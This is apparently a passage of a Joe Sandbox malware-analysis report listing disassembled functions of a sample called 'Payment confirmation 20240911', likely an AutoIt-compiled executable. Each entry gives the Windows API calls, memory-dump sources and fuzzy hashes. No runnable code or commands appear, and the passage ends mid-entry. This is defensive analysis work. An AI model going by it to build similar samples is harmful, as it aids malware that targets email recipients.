                                            • Part of subcall function 01308984: __mtinitlocknum.LIBCMT ref: 01308996
                                            • Part of subcall function 01308984: EnterCriticalSection.KERNEL32(01300127,?,0130876D,0000000D), ref: 013089AF
                                          • InterlockedIncrement.KERNEL32(DC840F00), ref: 01308775
                                          • __lock.LIBCMT ref: 01308789
                                          • ___addlocaleref.LIBCMT ref: 013087A7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                          • String ID:
                                          • API String ID: 1687444384-0
                                          • Opcode ID: 2617806c37059cad1eea4f8a2d8bf1ca97a5fce3d44971d3be27e9468b8cbad7
                                          • Instruction ID: c3729147bb32c209a809f768bacab2f41f31693b35ab2430f88c1a74c431fbdf
                                          • Opcode Fuzzy Hash: 2617806c37059cad1eea4f8a2d8bf1ca97a5fce3d44971d3be27e9468b8cbad7
                                          • Instruction Fuzzy Hash: B4016D75801B02DFD722EF69C414759F7E0AF50729F20894ED0AA876E0DB70A644CB05
                                          Function 0134E13E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 0134E14D
                                          • _memset.LIBCMT ref: 0134E15C
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,013A3EE0,013A3F24), ref: 0134E18B
                                          • CloseHandle.KERNEL32 ref: 0134E19D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _memset$CloseCreateHandleProcess
                                          • String ID:
                                          • API String ID: 3277943733-0
                                          • Opcode ID: 050fdca55e31267dbd7ef8776a710c8c25f255200ff8fc6133e45be50405751b
                                          • Instruction ID: b358870fa01a9f55ce2113dd92ae28d670a1f05915605fc45a4c5d14bc810a98
                                          • Opcode Fuzzy Hash: 050fdca55e31267dbd7ef8776a710c8c25f255200ff8fc6133e45be50405751b
                                          • Instruction Fuzzy Hash: 85F082F2690301BFF2205BA5AC06FB7BAACFB09398F404420FB48D9195D3B69C0487A4
                                          Function 01329C73 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                          Download Yara Rule
                                          APIs
                                          • EnterCriticalSection.KERNEL32(?), ref: 01329C7F
                                            • Part of subcall function 0132AD14: _memset.LIBCMT ref: 0132AD49
                                          • _memmove.LIBCMT ref: 01329CA2
                                          • _memset.LIBCMT ref: 01329CAF
                                          • LeaveCriticalSection.KERNEL32(?), ref: 01329CBF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                          • String ID:
                                          • API String ID: 48991266-0
                                          • Opcode ID: 43597dd9b5ee3659e383eb6e1fde15537c3d6924fb0127a690343db322ecf1de
                                          • Instruction ID: d7a2c7cbf7b300549dfcbaa01657f84af74e9e656592dbe399308a33dfe44748
                                          • Opcode Fuzzy Hash: 43597dd9b5ee3659e383eb6e1fde15537c3d6924fb0127a690343db322ecf1de
                                          • Instruction Fuzzy Hash: B2F05E7A200110ABCF016F98EC84A5AFB29EF55324F08C065FE089F21AC731E815DBF4
                                          Function 0134E83C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012FB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 012FB5EB
                                            • Part of subcall function 012FB58B: SelectObject.GDI32(?,00000000), ref: 012FB5FA
                                            • Part of subcall function 012FB58B: BeginPath.GDI32(?), ref: 012FB611
                                            • Part of subcall function 012FB58B: SelectObject.GDI32(?,00000000), ref: 012FB63B
                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0134E860
                                          • LineTo.GDI32(00000000,?,?), ref: 0134E86D
                                          • EndPath.GDI32(00000000), ref: 0134E87D
                                          • StrokePath.GDI32(00000000), ref: 0134E88B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                          • String ID:
                                          • API String ID: 1539411459-0
                                          • Opcode ID: b9b1a826e35c19922aaf9c7ad1e6abf240b9a8d47393b3f61404462431a20966
                                          • Instruction ID: ec88b2a44c9db2f791659ac03608c0680a97e35e459caac68432c73f71effdcd
                                          • Opcode Fuzzy Hash: b9b1a826e35c19922aaf9c7ad1e6abf240b9a8d47393b3f61404462431a20966
                                          • Instruction Fuzzy Hash: 12F05E31101259BBEB225F94AC0DFCA3F9DAF0A751F048111FB51250E587B99551CFA5
                                          Function 0131D623 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0131D640
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0131D653
                                          • GetCurrentThreadId.KERNEL32(00000000), ref: 0131D65A
                                          • AttachThreadInput.USER32(00000000), ref: 0131D661
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                          • String ID:
                                          • API String ID: 2710830443-0
                                          • Opcode ID: 83867a62c1f055ce55a8e776d1f7e2abd3f59d91a54f86bd347d7e7934c7567f
                                          • Instruction ID: add085c089efbfa6ecb11fe08e33886e1c3a3f726d0064cb7c571499373fbc6a
                                          • Opcode Fuzzy Hash: 83867a62c1f055ce55a8e776d1f7e2abd3f59d91a54f86bd347d7e7934c7567f
                                          • Instruction Fuzzy Hash: 4FE03931201228BAEB201FE29C0DEDB7F1CEF167B1F80C010F64C85064CBB59980CBA0
                                          Function 0131BDF8 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentThread.KERNEL32(00000028,00000000,?,00000000,0131B87A,?,?,?,0131B9C9), ref: 0131BE01
                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,0131B9C9), ref: 0131BE08
                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0131B9C9), ref: 0131BE15
                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,0131B9C9), ref: 0131BE1C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CurrentOpenProcessThreadToken
                                          • String ID:
                                          • API String ID: 3974789173-0
                                          • Opcode ID: e66dda217fba67ba9325d27fca0546ae1689e07b3cac8bc730b23b79f14fb75d
                                          • Instruction ID: 50b5a1c48adf7424e4a4a4a2901c2930c6f7ebf5130cfc986919496aecd6d6ca
                                          • Opcode Fuzzy Hash: e66dda217fba67ba9325d27fca0546ae1689e07b3cac8bc730b23b79f14fb75d
                                          • Instruction Fuzzy Hash: 1DE04F327412119BD7201EF5AC0CB967AACEF58796F11C818F2C5DA048D63480418770
                                          Function 012FB0AC Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSysColor.USER32(00000008,00000000), ref: 012FB0C5
                                          • SetTextColor.GDI32(?,000000FF), ref: 012FB0CF
                                          • SetBkMode.GDI32(?,00000001), ref: 012FB0E4
                                          • GetStockObject.GDI32(00000005), ref: 012FB0EC
                                          • GetWindowDC.USER32(?), ref: 0135ECFA
                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0135ED07
                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0135ED20
                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0135ED39
                                          • GetPixel.GDI32(00000000,?,?), ref: 0135ED59
                                          • ReleaseDC.USER32(?,00000000), ref: 0135ED64
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                          • String ID:
                                          • API String ID: 1946975507-0
                                          • Opcode ID: c5d651ebd0a0c10a9cb7ed26f1ebaf3dd07b76afe8ad5310bb3b1154d4c05f76
                                          • Instruction ID: 6b427b8ba5b6b7ec786077e59624b27f05862ec332ca2d0db0c1d2cc2897fd76
                                          • Opcode Fuzzy Hash: c5d651ebd0a0c10a9cb7ed26f1ebaf3dd07b76afe8ad5310bb3b1154d4c05f76
                                          • Instruction Fuzzy Hash: 33E06531200240EEEF715FB8A809B887F159B05335F00C265FBA5580E6C3B18140DB11
                                          Function 0131C066 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0131C071
                                          • UnloadUserProfile.USERENV(?,?), ref: 0131C07D
                                          • CloseHandle.KERNEL32(?), ref: 0131C086
                                          • CloseHandle.KERNEL32(?), ref: 0131C08E
                                            • Part of subcall function 0131B850: GetProcessHeap.KERNEL32(00000000,?,0131B574), ref: 0131B857
                                            • Part of subcall function 0131B850: HeapFree.KERNEL32(00000000), ref: 0131B85E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                          • String ID:
                                          • API String ID: 146765662-0
                                          • Opcode ID: eed81615044fe16ac6d6d2b3260e546bc06a83a01f93dd1f1dcd284532d4c237
                                          • Instruction ID: 62a4f40048f355e823646a9877a7e6325886145eebfa9d30e6031f808e424b51
                                          • Opcode Fuzzy Hash: eed81615044fe16ac6d6d2b3260e546bc06a83a01f93dd1f1dcd284532d4c237
                                          • Instruction Fuzzy Hash: B2E0B636204006FFCB512FE6ED08859FF7AFF993217108225F66581978CB72A831EB90
                                          Function 0135C0A0 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CapsDesktopDeviceReleaseWindow
                                          • String ID:
                                          • API String ID: 2889604237-0
                                          • Opcode ID: 7f391b57947d9d3e2ec14f3464e2d599f6a612ac09fd122d4b4f1960c2a45d55
                                          • Instruction ID: acad0c87f86f097057b0d90bbdf51ba69adf25bb6a89b1d91f0a0fa8bc1f7297
                                          • Opcode Fuzzy Hash: 7f391b57947d9d3e2ec14f3464e2d599f6a612ac09fd122d4b4f1960c2a45d55
                                          • Instruction Fuzzy Hash: BBE04FB1600204EFDB205FB0D84CA697BADEB4C364F01C419FD8A87224DB74DC808B50
                                          Function 0135C0B4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CapsDesktopDeviceReleaseWindow
                                          • String ID:
                                          • API String ID: 2889604237-0
                                          • Opcode ID: 0f33396bc6bc9566206e498775ac1809a09873e168de9a2ed6d726e1b2bb7757
                                          • Instruction ID: 9356c77b8b9061d134610d59da2a61796b4d8fd5d1d7d563556ea4dae31ca179
                                          • Opcode Fuzzy Hash: 0f33396bc6bc9566206e498775ac1809a09873e168de9a2ed6d726e1b2bb7757
                                          • Instruction Fuzzy Hash: 5DE04FB1600204EFDB105FB0D84C6697BA9EB4C360F01C419F98A87224DB7899408B50
                                          Function 01304C3D Relevance: 6.0, APIs: 4, Instructions: 14threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __getptd_noexit.LIBCMT ref: 01304C3E
                                            • Part of subcall function 013086B5: GetLastError.KERNEL32(?,01300127,013088A3,01304673,?,?,01300127,?,012E125D,00000058,?,?), ref: 013086B7
                                            • Part of subcall function 013086B5: __calloc_crt.LIBCMT ref: 013086D8
                                            • Part of subcall function 013086B5: GetCurrentThreadId.KERNEL32(013088A3,01304673,?,?,01300127,?,012E125D,00000058,?,?), ref: 01308701
                                            • Part of subcall function 013086B5: SetLastError.KERNEL32(00000000,01300127,013088A3,01304673,?,?,01300127,?,012E125D,00000058,?,?), ref: 01308719
                                          • CloseHandle.KERNEL32(?), ref: 01304C52
                                          • __freeptd.LIBCMT ref: 01304C59
                                          • ExitThread.KERNEL32 ref: 01304C61
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit
                                          • String ID:
                                          • API String ID: 408300095-0
                                          • Opcode ID: 3d61fda31c346803a0164c5d8440a606fb9f65a17d38bee1aa46386dca63e827
                                          • Instruction ID: cae8c5215d6989033fb663e782810bdbdb994d5969b72f88332148265990d928
                                          • Opcode Fuzzy Hash: 3d61fda31c346803a0164c5d8440a606fb9f65a17d38bee1aa46386dca63e827
                                          • Instruction Fuzzy Hash: 80D02331801E529FD5333B6C8D1C60D36D45F01B3DF02C304D375050E0CF2085554791
                                          Function 01362350 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 475COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID: >$DEFINE
                                          • API String ID: 4104443479-1664449232
                                          • Opcode ID: 73e1fa01288f047aa865da25ec0b2b184aa5002bf6e56629814f2da732c52028
                                          • Instruction ID: eda5236d0eaa28b3f85acf2711eb55688bfb0c15560108d7711f20c12a57b101
                                          • Opcode Fuzzy Hash: 73e1fa01288f047aa865da25ec0b2b184aa5002bf6e56629814f2da732c52028
                                          • Instruction Fuzzy Hash: CA12AE74A1020ADFCF25CF98C484AADBBB5FF48318F56815AE909AB355D730E985CB90
                                          Function 0131EAD5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OleSetContainedObject.OLE32(?,00000001), ref: 0131ECA0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ContainedObject
                                          • String ID: AutoIt3GUI$Container
                                          • API String ID: 3565006973-3941886329
                                          • Opcode ID: 9589a451114fbabcdd08c0b46b4fe6ac417b85f3e4e8d010256bda8a4a819ee2
                                          • Instruction ID: 679d20aa010939132b042d21a9b26ad7a39a54e321a7f1663e2f06b5654fa63a
                                          • Opcode Fuzzy Hash: 9589a451114fbabcdd08c0b46b4fe6ac417b85f3e4e8d010256bda8a4a819ee2
                                          • Instruction Fuzzy Hash: FE914A74600701EFDB19CF68C884B6ABBF9BF48718F14846DE94ACB694DB71E841CB60
                                          Function 0132E704 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012E3BCF: _wcscpy.LIBCMT ref: 012E3BF2
                                            • Part of subcall function 012E84A6: __swprintf.LIBCMT ref: 012E84E5
                                            • Part of subcall function 012E84A6: __itow.LIBCMT ref: 012E8519
                                          • __wcsnicmp.LIBCMT ref: 0132E785
                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0132E84E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                          • String ID: LPT
                                          • API String ID: 3222508074-1350329615
                                          • Opcode ID: b6af1c9db1057a85f1cf9bc03c5fb88fb394c1d01ce1dae5599587ae900cef5d
                                          • Instruction ID: 43ab173019ad36c92a56708eb5fd93f367ea83631f322a6813bdf90b58fce288
                                          • Opcode Fuzzy Hash: b6af1c9db1057a85f1cf9bc03c5fb88fb394c1d01ce1dae5599587ae900cef5d
                                          • Instruction Fuzzy Hash: 0E616275A10229AFDF15EF98C895EBEBBF8EF08714F044069E546AB390D770AE40CB50
                                          Function 012E1B72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Sleep.KERNEL32(00000000), ref: 012E1B83
                                          • GlobalMemoryStatusEx.KERNEL32 ref: 012E1B9C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: GlobalMemorySleepStatus
                                          • String ID: @
                                          • API String ID: 2783356886-2766056989
                                          • Opcode ID: d010c850fdf6379671c6485bdcc322f42be6aaf483b5c352c6878900fd4ef5c9
                                          • Instruction ID: 3c5233d235ecbcafd04ad526da1ca1144ffca3b921452fae041df1f80075af0f
                                          • Opcode Fuzzy Hash: d010c850fdf6379671c6485bdcc322f42be6aaf483b5c352c6878900fd4ef5c9
                                          • Instruction Fuzzy Hash: 6B514871418749EBE320AF14D889BAFBBECFBA9354F41485DF2C8410A5EB71856C8762
                                          Function 0132CE59 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012E417D: __fread_nolock.LIBCMT ref: 012E419B
                                          • _wcscmp.LIBCMT ref: 0132CF49
                                          • _wcscmp.LIBCMT ref: 0132CF5C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _wcscmp$__fread_nolock
                                          • String ID: FILE
                                          • API String ID: 4029003684-3121273764
                                          • Opcode ID: dddf769c437261da5ebc9c8f839db3ec26c904e7a6edeb8ef795e230bd5e25db
                                          • Instruction ID: 447a2cbf6a97e60f20d3675ec21439d002e697766db7784ad463b6d7f7e7bd06
                                          • Opcode Fuzzy Hash: dddf769c437261da5ebc9c8f839db3ec26c904e7a6edeb8ef795e230bd5e25db
                                          • Instruction Fuzzy Hash: 6841A632A1025ABADF21EBA4CC84FEF7BB9EF59714F000469E601EB190D771DA448760
                                          Function 013357D7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 013357E7
